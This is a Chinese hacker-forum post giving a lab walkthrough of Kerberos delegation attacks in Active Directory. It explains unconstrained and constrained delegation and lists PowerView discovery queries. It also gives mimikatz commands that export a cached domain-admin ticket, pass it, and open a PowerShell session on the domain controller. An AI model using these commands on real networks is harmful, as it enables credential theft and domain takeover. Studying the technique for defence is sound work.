跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

  • 0

渗透测试之Kerberos委派攻击 内网入侵章


HACK1949

问题

渗透测试之Kerberos委派攻击 内网入侵章

5fdeafb96b098.png

0x00前言

昨天晚上在先知社区见到相关的Keberos委派攻击的文章。晚上在弄别的事情没有实验,早上抽空实验一波.

此教程文章只用于安全参考!!切勿使用技术违规操作!!

有什么其它问题地方可以私聊指出,谢谢。

0x01环境

Windows server 2008 R2:192.168.1.122 (AD)
Windows 7:192.168.1.107
工具:mimikatz、keke

0x02何为委派

先知社区的解释:域委派是指将域内部用户的权限委派给服务账号,使用服务账号能以用户的权限在域内展开活动
安全客机的解释:在域中如果出现一种使用Kerberos身份验证访问域中的服务B,而B再利用A的身份去请求域中的服务C,这个过程就可以理解为委派

0x03委派的分类

委派分为两种:

  • 非约束委派
  • 约束委派

非约束委派:
非约束委派在Kerberos中实现时,用户可以从KDC处得到的TGT发送给访问的service1(可以是任意服务),service1拿到TGT之后可以通过TGT访问域内部任意其他服务,所以被称为非约束委派。

约束委派:
由于非约束委派的不安全性,微软在Windows 2003中发布了约束委派的功能。约束委派在Kerberos中的用户不会直接发送TGT给服务,而是对发送给service1的认证信息做了限制,永久服务1代表用户使用该TGT去访问其他服务。这里包括一组S4U2Self(用户对自己的服务)和S4U2Proxy(用户对代理的服务)的Kerberos协议扩展。

0x04非约束委派的设置

在域中只有服务账户才能有委派功能,所以先把用户user01设置为服务账号。

setspn -A https/apache2.4 user01

v2-2dc2e764fff355463475510de3bf67b0_720wv2-0d20750a5ec4a18adddfc03330ba22de_720w

之后在AD编辑查看用户可以看到,非约束委派设置好的标明

v2-08175211f02e376b394da7831d62ab49_720w

0x05约束委派的设置

把用户设置为服务账号

v2-2af45ae7465f99ce4043a4c8eba73cc6_720w

0x06两者设置后在AD EDIT的区别

当服务账号或者主机被设置为非约束性委派时,其userAccountControl属性会包含TRUSTED_FOR_DELEGATION
当服务账号或者主机被设置为约束性委派时,其userAccountControl属性包含TRUSTED_TO_AUTH_FOR_DELEGATION,并且msDS-AllowedToDelegateTo属性会包含被约束的服务

0x07非约束委派的发现

发现域中的委派主机或账户:

通过Import-Module PowerView.ps1加载PowerView脚本之后使用下面的命令进行查询。
查询域中配置非约束委派的账户:
Get-NetUser -Unconstrained -Domain <domain>
这里的PowerView是master分支的

v2-6c62f2abd9b0b1685b5e7421fdacbb44_720w

查询域中配置非约束委派的主机:

Get-NetComputer -Unconstrained -Domain <domain>

v2-b47600ad43a95997265e32e6eed56840_720w

0x08约束委派的发现

查询域中配置约束委派的账户:
(dev分支的powerSploit)

Get-DomainUser –TrustedToAuth -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto| fl

v2-26996d3daddc3b9bd32d574bf4ea5e63_720w

查看设置了约束委派的用户:

Get-DomainUser -TrustedToAuth -Domain www.haq.com

v2-91fcc252152da8aca0b281b884b56b60_720w

查询域中配置约束委派的主机:

Get-DomainComputer -TrustedToAuth -Domain <domain>

v2-7608edc16109a5c3bd2614f670d49555_720w

0x09非约束委派的利用

假设域控用管理员账号smb登录了某台域机器,那这个时候域管理员的TGT已经缓存在域机器
使用mimikatz添加内存

privilege::debug
sekurlsa::tickets /export

v2-b23edb00521ad81d88dd98609d33d959_720w

最主要的是这个(域管的TGT)

v2-e1228648718a0914cd543211b6f36527_720w

此时我们在没有凭证的情况下访问域控的共享C盘是没有权限的(图忘截了,下面的图顶替一下)

v2-2345e1f081833f9edee55c6abb0bc2b8_720w

mimikatz引入凭证

privilege::debug
kerberos::ptt [0;2c06d4][email protected]
kerberos::list

v2-f157675151e7592c6960007c0f112094_720w

之后我们可以使用Enter-PSSession获取一个shell

Enter-PSSession -ComputerName <主机名>(不能IP)

v2-4aed12d5b5188915acb9d49531a65a0e_720w

0x10约束委派的利用

利用条件:

已知当前配置了约束委派的当前账户的密码

通过已知的账户名和明文密码对KDC发起请求,得到TGT

v2-fa99208fe1176a46e198d5e3fb1860f6_720w

使用kekeo申请TGS票据(我这里失败了)

v2-e2ba8e11ca045cf776558a4000275cf2_720w

所以下面的引入凭证,也不会认证成功

v2-1314174eafd93a912e9a358e7443e6af_720w

链接帖子
意见的链接
分享到其他网站

这个问题有0个答案

推荐的帖子

此问题没有答案

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...